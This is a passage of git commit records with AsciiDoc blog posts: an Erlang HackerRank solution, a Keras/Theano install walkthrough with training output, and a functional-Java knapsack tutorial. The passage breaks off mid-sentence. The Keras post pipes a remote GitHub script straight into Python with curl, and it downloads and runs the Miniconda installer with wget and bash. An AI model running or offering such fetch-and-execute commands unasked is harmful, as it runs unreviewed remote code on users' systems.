xref:..\/installing\/installing_aws\/installing-restricted-networks-aws.adoc#installing-restricted-networks-aws[Amazon Web Services].\n\n[id=\"restricted-networks-additional-resources\"]\n== Additional resources\n\n* See xref:..\/support\/gathering-cluster-data.adoc#gathering-data-specific-features_gathering-cluster-data[Gathering data about specific features] for more information about using must-gather.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95e872ccdddb7ecf19718c176dd29bc35340876a","subject":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","message":"Update 2015-02-21-Writing-Hello-World-N-Times.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_file":"_posts\/2015-02-21-Writing-Hello-World-N-Times.adoc","new_contents":"= Writing \"Hello World\" N Times \n:hp-tags: hackerrank, functional programming, Erlang \n\nIn order to learn functional programming and about Concurrency this year I picked http:\/\/www.erlang.org[Erlang]. \n\nI also want to keep solving some problems so that the syntax becomes very familier to me and I found https:\/\/www.hackerrank.com\/domains\/fp\/intro[Hackerrank] has functional programming domain which lets you solve problems. \n\nI will be posting whatever I try and new things I learned. This may be useful to others who are new to Erlang or Functional Programming. \n\npass:[<u>Problem?<\/u>]\n----\nPrint \"Hello World\" N times. The input portion will be handled automatically. You need to write a function with the recommended method signature.\n----\n\nThis sounds extremely simple to me using list comprehensions and it is, but part I was not sure was how to read from standard input and write to standard output in Erlang. \n\nAfter some google searches, I found exact same question on http:\/\/stackoverflow.com\/a\/10873293\/379235[StackOverflow].\n\nI found out that I need to know about http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fr#fread\/2[fread] and http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fwr#fwrite\/1[fwrite]. That was it. \n\n\npass:[<u>My Solution<\/u>]\n\n[source,erlang]\n-----\n-module(hr).\n-author(\"harith\").\n\n-export([main\/0]).\n\nmain() ->\n {ok, [N]} = io:fread(\"\", \"~d\"),\n hello(N).\n\nhello(N) when N >= 0, N =< 50 ->\n [io:format(\"Hello World~n\") || _I <- lists:seq(1,N)].\n----- \n\n\nLet me know if you have a better way of doing this.","old_contents":"= Writing \"Hello World\" N Times \n:hp-tags: hackerrank, functional programming, Erlang \n\nIn order to learn functional programming and about Concurrency this year I picked http:\/\/www.erlang.org[Erlang]. \n\nI also want to keep solving some problems so that the syntax becomes very familier to me and I found https:\/\/www.hackerrank.com\/domains\/fp\/intro[Hackerrank] has functional programming domain which lets you solve problems. \n\nI will be posting whatever I try and new things I learned. This may be useful to others who are new to Erlang or Functional Programming. \n\npass:[<u>Problem?<\/u>]\n----\nPrint \"Hello World\" N times. The input portion will be handled automatically. You need to write a function with the recommended method signature.\n----\n\nThis sounds extremely simple to me using list comprehensions and it is, but part I was not sure was how to read from standard input and write to standard output in Erlang. \n\nAfter some google searches, I found exact same question on http:\/\/stackoverflow.com\/a\/10873293\/379235[StackOverflow].\n\nI found out that I need to know about http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fr#fread\/2[fread] and http:\/\/erldocs.com\/current\/stdlib\/io.html?i=0&search=io:fwr#fwrite\/1[fwrite]. That was it. \n\n\npass:[<u>My Solution<\/u>]\n\n[source,erlang]\n-----\n-module(hr).\n-author(\"harith\").\n\n-export([main\/0]).\n\nmain() ->\n {ok, [N]} = io:fread(\">\", \"~d\"),\n hello(N).\n\nhello(N) when N >= 0, N =< 50 ->\n [io:format(\"Hello World~n\") || _I <- lists:seq(1,N)].\n----- \n\n\nLet me know if you have a better way of doing this.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"57c7f3afebcf170a1e84ab73d90e351d55e9b6f7","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git python-pip\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n.Error\n[NOTE]\n****\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n****\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","old_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n.Error\n[NOTE]\n****\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n****\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f5c7770a681984e5dc2afbc7b297c5def75cc4fa","subject":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","message":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_contents":"= Folding the Universe, part I\n:published_at: 2016-06-11\n\nFolding the Universe is actually the title of a book by Peter Engel which is subtitled \"Origami From Angelfish to Zen\", suggesting that anything in the universe may be modelled out of folded paper. The analogy with computer programming is interesting since, in functional programming, nearly every problem can be solve with folds.\n\nComputer programming is primarily about abstraction. Instead of doing the same basic tasks again and again, we once write programs to performs these tasks, and we can then build larger programs by composing these basic tasks. Probably one difference between functional and imperative programmers is the way they handle task abstractions. Most often, imperative programmers start thinking about abstracting subtasks when they realize that they are repeatedly writing the same code. But the depth of abstraction is often kept quite minimal. The main reason is that higher level abstractions are generally provided by the language. Arithmetic operations on integers, for example, is provided by nearly all programming languages, so there is no need to write specific code to abstract them (although it is possible, and an interesting challenge!).\n\nLoops are another kind of abstraction that is provided by many languages. Most imperative programmers would not believe that there exist programming languages without loops. Is it possible to program without loops? Of course, it is. It is even possible to program with absolutely no control structures.\n\nMaybe you think that it is possible in some very specific languages specially designed for this. Nothing could be more wrong. Take Java, for example. It is perfectly possible to write any program without ever using a for loop, a while loop, a switch case selector, or event an if..else construct. You don't believe it? Read on.\n\nNot only can you write java programs without any control structure, but you can also completely avoid variables. Is this useful? Well, avoiding variables is indeed very useful to write safer concurrent programs since it frees us from all concurrency problems, such as deadlock, livelocks, stale data, races, corruption and more. But it is also safer for non concurrent programs since you can confidently reuse data knowing that it will not have been altered.\n\nAvoiding control structures also brings many advantages, but it is more difficult to make it evident. Evidence comes with usage. But in all cases, it is a very rewarding challenge. So why not give it a try?\n\nWarning: If you are the kind of programmer who think in terms of best practices, design patterns, productivity through the use of multiple libraries, or if you have ever thought that \"this is not the way Java (or anything else) has been intended to be used\", or if you think that we should never try to reinvent the wheel, you should probably not continue reading. (By the way, if the wheel had not been reinvented many times, it would still be circular and spinning around its center, so there would be no cars, no trains, nor anything else using modern wheels, but this is another story.)\n\n== The challenge\n\nThe challenge is to solve a well known computer problem while using no variables (only constants) and no control structures. We can create classes and methods, we can use the arithmetic operations and comparisons. We could do without, but we would have to design a whole number system with operators, based on folds, which is perfectly feasible, but a bit cumbersome. We will use Java 8 `Function` and `BiFunction`, because creating ours would be a waste of time (but minimal, since this would need only three lines of code each).\n\nThe problem to solve is known as the _Knapsack problem_. Basically, it consists in packing a knapsack with items in the best possible manner. The knapsack has a maximum capacity, and each item has a name, a weight and a value. The goal is to pack the maximum value in the knapsack without exceeding its capacity. If you want to get an idea of how to solve this in a traditional imperative manner in Java, you can look at this example: https:\/\/rosettacode.org\/wiki\/Knapsack_problem\/0-1#Java[Knapsack problem\/0-1]. I strongly encourage you to look at the example to have an idea of how this problem may be solved in imperative style in just 300 lines of (non reusable) code.\n\n== How to handle the problem\n\nFirst, we will define the business objects. The first thing we will need is a class to represent items. It will be a very basic class:\n\n[source,java]\n----\npublic class Item {\n public final String name;\n public final int weight;\n public final double value;\n\n public Item(String name, int weight, double value) {\n this.name = name;\n this.weight = weight;\n this.value = value;\n }\n\n public String toString() {\n return String.format(\"item(%s, %s, %s)\", name, weight, value);\n }\n}\n----\n\nIf you don't like public fields, feel free to make them private and write the corresponding getters. It is absolutely useless, however, just making the code longer. The `toString` method is for convenience, in order to print the result. In fact, there is absolutely no logic in this class.\n\nThen, we need a class to represent the knapsack:\n\n[source,java]\n----\npublic class Knapsack {\n\n private final List<Item> items;\n private final double value;\n private final int weight;\n private final int available;\n\n private Knapsack(double value, List<Item> items, int weight, int available) {\n this.value = value;\n this.items = items;\n this.weight = weight;\n this.available = available;\n }\n\n private Knapsack add(Item item) {\n return new Knapsack(this.value + item.value, this.items.cons(item), this.weight + item.weight, this.available - item.weight);\n }\n\n private boolean canAccept(Item item) {\n return item.weight <= this.available;\n }\n\n private Knapsack maxValue(Knapsack that) {\n return this.value >= that.value ? this : that;\n }\n\n public String toString() {\n return String.format(\"Total value: %s\\nTotal weight: %s\\nItems:\\n%s\",\n value, weight, items.foldRight(\"\",\n (item, string) -> String.format(\"\\t%s\\n%s\", item, string)));\n }\n\n private static Knapsack empty(int capacity) {\n return new Knapsack(0.0, List.list(), 0, capacity);\n }\n\n private static Knapsack pack(List<Item> items, Knapsack knapsack) {\n ...\n }\n\n public static Knapsack pack(List<Item> items, int knapsackCapacity) {\n return pack(items, empty(knapsackCapacity));\n }\n}\n----\n\nAs you can see, a `Knapsack` has four properties: a list of items, a value, a weight, and an available capacity, meaning how much weight can be added before the knapsack is full. The `value` and `weight` fields are for convenience and optimization. We could compute them each time we need them, but it would waste time. They are used for memoization of the weight an value, which trades times against memory space.\n\nThe constructor is private, and we have only one factory method called `empty` that creates an empty knapsack. Adding an item to the knapsack is done through the `add` method, which does not mutate anything but creates and returns a new `Knapsack` with the updated value. You might argue that the `List<Item>` is mutated, but it is not, because it is not a Java `List`. More on this later.\n\nThere are three utility methods: `canAccept(Item)` allows knowing if the knapsack has enough available capacity to receive a given item. The `maxValue` method compares two `Knapsack` instances and returns the one with the greatest value. The `toString` method, of course, returns a readable representation of the knapsack.\n\nThe interesting part is the `pack` method, which takes a list of items and a `Knapsack` and returns the `Knapsack` (in fact a new one) with as much value as possible packed into it. Plus, there is a convenience `pack` method taking a list of items and a capacity.\n\nBefore looking at the core of the problem (the `pack` method), lets see how this program will be used:\n\n[source,java]\n----\n public static void main(String... args) {\n\n int capacity = 400;\n\n final List<Item> items = List.<Item>list()\n .cons(new Item(\"map\", 9, 150.0))\n .cons(new Item(\"compass\", 13, 35.0))\n .cons(new Item(\"water\", 153, 200.0))\n .cons(new Item(\"sandwich\", 50, 160.0))\n .cons(new Item(\"glucose\", 15, 60.0))\n .cons(new Item(\"tin\", 68, 45.0))\n .cons(new Item(\"banana\", 27, 60.0))\n .cons(new Item(\"apple\", 39, 40.0))\n .cons(new Item(\"cheese\", 23, 30.0))\n .cons(new Item(\"beer\", 52, 10.0))\n .cons(new Item(\"cream\", 11, 70.0))\n .cons(new Item(\"camera\", 32, 30.0))\n .cons(new Item(\"tshirt\", 24, 15.0))\n .cons(new Item(\"trousers\", 48, 10.0))\n .cons(new Item(\"umbrella\", 73, 40.0))\n .cons(new Item(\"trousers\", 42, 70.0))\n .cons(new Item(\"overclothes\", 43, 75.0))\n .cons(new Item(\"notecase\", 22, 80.0))\n .cons(new Item(\"sunglasses\", 7, 20.0))\n .cons(new Item(\"towel\", 18, 12.0))\n .cons(new Item(\"socks\", 4, 50.0))\n .cons(new Item(\"book\", 30, 10.0));\n\n System.out.println(Knapsack.pack(items, capacity));\n }\n}\n----\n\nAs you can see, it is very simple, although the way the list is constructed may look a bit weird. As said earlier, this is not a Java `List`, but a functional singly linked list. It is represented by an abstract `List` class and two internal subclasses, `Nil` and `Cons` representing the empty and non empty lists. A `Nil` has no property, while a `Cons` has a `head`, which is the first element in the list, and a `tail` which is the rest of the list:\n\n[source,java]\n----\npublic abstract class List<A> {\n\n public List<A> cons(A a) {\n return new Cons<>(a, this);\n }\n\n private static class Nil<A> extends List<A> {\n\n }\n\n private static class Cons<A> extends List<A> {\n\n private final A head;\n private final List<A> tail;\n\n private Cons(A head, List<A> tail) {\n this.head = head;\n this.tail = tail;\n }\n }\n\n @SuppressWarnings(\"rawtypes\")\n private static List NIL = new List.Nil();\n\n @SuppressWarnings(\"unchecked\")\n public static <A> List<A> list() {\n return NIL;\n }\n}\n----\n\nAs you can see, it is a very simple data structure. The parent class defines a method `cons` adding an element to the list. It has also a static factory method returning an empty list. Note that this method returns an untyped singleton, which means that their can exist only one empty list. As a consequence, all empty lists are considered equals.\n\n== Folding\n\nNow you can see how the list of items is constructed. However, you may wonder how we could ever use this list, since there is no mean to access its elements. In fact, we only need one operation: folding the list. Any processing you can imagine on a list may be done with a fold. Folding consists in taking a value of the intended result type (generally different from the elements type) and combining it with an element, then combining the result with the next element and so on until all elements have been processed.\n\n=== Folding right or left\n\nWe can fold a list starting from the left (the head of the list) or for the right (the last element of the list). To fold from the left, we use a left associative operation. To fold from the right, we need... well, you guess.\n\nHere is how we can write a `foldRight` method. First the signature in the abstract parent `List` class:\n\n----\npublic abstract <B> B foldRight(B z, BiFunction<A, B, B> f);\n----\n\nThe `z` parameter is the starting result. It is called `z` by convention, meaning \"zero\", by analogy with the starting result for the sum of a list of integers.\n\nThe operation used for the fold is represented by a `BiFunction`, taking an `A` (element of the list) and a `B` the current result) and returning a `B` (the next current result). In the `Nil` class, the implementation simply return `z`, since there is no element to which to apply the function:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return z;\n}\n----\n\nIn the `Cons` class, the implementation simply combine the `head` element with the result of a recursive call to fold the `tail`:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return f.apply(head, tail.foldRight(z, f));\n}\n----\n\nNote that this implementation is recursive, and recursion happens on the stack, so it will blow the stack for lists of more than a few thousands elements. In my book https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], I show how to make recursion happen on the heap, but this would be a bit too long for this article. Alternatively, you can have a look at this article: https:\/\/pysaumont.github.io\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\n== Folding, folding, folding...\n\nWith this method, we can solve nearly all the problems we might have to solve. To understand how we can do this, it's interesting to first show how we can make a copy of the list:\n\n[source,java]\n----\npublic List<A> copy() {\n return foldRight(list(), (a, list) -> list.cons(a));\n}\n----\n\nWe simply start with an empty list and add the elements to it, one after the other, starting from the right.\n\nFor our specific Knapsack problem, we need a `map` method applying a function to all elements of the list. This exactly like a copy, excepted that we apply the function before adding each element to the new list:\n\n[source,java]\n----\npublic <B> List<B> map(Function<A, B> f) {\n return foldRight(list(), (a, list) -> list.cons(f.apply(a)));\n}\n----\n\nWe will also need a `flatMap` method doing the same thing with a function returning a list. Here is the implementation:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.foldRight(f.apply(a), (a2, list2) -> list2.cons(a2)));\n}\n----\n\nThis may look a bit complicated, but it is in fact equivalent to the following, where the `concat` method is used to create a single list my concatenating two lists:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.concat(f.apply(a)));\n}\n\npublic List<A> concat(List<A> list) {\n return foldRight(list, (a, acc) -> acc.cons(a));\n}\n----\n\nWe will also need a method to return the length of the list:\n\n[source,java]\n----\nprivate int length() {\n return foldRight(0, (a, length) -> length + 1);\n}\n----\n\nHere, we ignore the elements, simply adding one to the result at each step. (Note that this is a very inefficient way to get the length of a list. Using memoization is much faster although it uses more memory.)\n\nEventually, we will need to access the `head` and the `tail` of the list. But we can't simply add methods for this, since we would not know what to return in the `Nil` class. For the tail, we could return an empty list, but what about the `head`?\n\nA (temporary!) solution is to return a `List<A>` for the head, which will either be an empty list, for a `Nil`, or a list containing a single element, in case of a `Cons`. Here is the implementation:\n\n[source,java]\n----\npublic List<A> head() {\n return foldRight(list(), (a, list) -> list.length() == 0\n ? list.cons(a)\n : list);\n}\n----\n\nFor the `tail`, we will return a `List<List<A>>`:\n\n[source,java]\n----\npublic List<List<A>> tail() {\n return new Cons<>(foldRight(list(), (a, list) -> list.length() == 0\n ? list\n : list.cons(a)), list());\n}\n----\n\nThese methods are really not very efficient, but it is just to show that everything can be done with a fold. We will optimize these later.\n\nWe now have all the elements we need.\n\n== The heart of the problem\n\nNow, you think we are left with the hard part: implementing the `pack` method. First, let's look at the algorithm:\n\n- look at the first element. If it does not fit into the knapsack, discard it.\n\n- if it fits, lets make two different computations:\n\n * first, add the element to the knapsack and continue with the rest of the list.\n\n * second, discard the element and continue with the rest of the list.\n\n * compare the values of the two results, select the highest, and return it.\n\nCould'it be simpler? Here is the corresponding implementation:\n\n[source,java]\n----\nprivate static Knapsack pack(List<Item> items, Knapsack knapsack) {\n return items.head().flatMap(item -> items.tail().map(itemList -> knapsack.canAccept(item)\n ? pack(itemList, knapsack).maxValue(pack(itemList, knapsack.add(item)))\n : pack(itemList, knapsack))).foldRight(knapsack, (a, b) -> a);\n}\n----\n\nThe only weird thing to remark is that our algorithm returns a list containing the resulting knapsack, so we extract it with `foldRight(knapsack, (a, b) -> a)`\n\nWe're done, and the core of our program has only three lines. (It could be written in only one line!) The `List` class is not at all specific to our program and could be used as part of a future functional library. The rest of the code (the `Item` class and the rest of the `Knapsack` class) belongs to the business model, and is only a description of our business data. Here is an example of what our program displays:\n\n----\nTotal value: 1030.0\nTotal weight: 396\nItems:\n item(map, 9, 150.0)\n item(compass, 13, 35.0)\n item(water, 153, 200.0)\n item(sandwich, 50, 160.0)\n item(glucose, 15, 60.0)\n item(banana, 27, 60.0)\n item(cream, 11, 70.0)\n item(trousers, 42, 70.0)\n item(overclothes, 43, 75.0)\n item(notecase, 22, 80.0)\n item(sunglasses, 7, 20.0)\n item(socks, 4, 50.0)\n----\n\n== About the head and tail methods\n\nFor these methods, we chose to return lists in order to be able to represent the absence of data. The main problem with this approach is that there is no mean to insure that some additional data will not be inserted by mistake in these lists. To avoid this, we generally use a different class, called `Option`, which is exactly like a `List` but where the `Nil` class is called `None` and the `Cons` class is called `Some` and has no tail. Other than this, it is exactly the same, excepted for the `fold` method which is called something else, like `getOrElse` and don't use a function. (Or uses the default \"identity\" function to be more accurate.) Beside this, it is sometimes difficult to distinguish between real lists (that can have several elements) and \"option\" lists (that can have at most one). This may make the program more difficult to read. On the other hand, it makes it much easier to compose the two cases, since they are represented by the same type. In a next article, I'll show in detail what this means.\n\n== The limitations of this solution\n\nI have already indicated that since this program is recursive, and recursion in Java occurs on the stack, and since the stack has a very limited sized, this program will not work for much more than two or three thousands items. This may be out of concern, since a knapsack generally contains much less, but the problem is in fact much more general. It could be use to optimized the way to cut ropes or rods in pieces (while minimizing the loss), or to divide any quantity in the most efficient manner.\n\nRecursion is sometimes called the `goto` of functional programming. This does not mean it should not be used, but that it should be abstracted. This is exactly what `foldRight` does. In other words, it is perfectly acceptable to use recursion inside the list class, although it probably should be used only once or twice. But using it in a business program is generally a bad practice. Moreover, in the real life, if we are using Java, we might want to optimize the fold for performance, using standard Java loops. In such case, it would be even more important to encapsulate these \"dirty\" parts in the `List` class. Or, as I already said, we can make recursion happen on the heap rather that on the stack. To learn how to do this, please refer to my book, https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], or to this article: http:\/\/www.fpinjava.com\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\nThis said, there is a much more radical limitation in this example. If you examine the `pack` method, you will see that it is bi-recursive, which means it calls itself twice. This means that for the first level, there will be two calls. Each of these two calls will trigger two new calls, for a total of four. It is not difficult to see that this number of calls will grow exponentially. The consequence is that this program will not overflow the stack because it will never run longer enough for this. It will not work for more than around 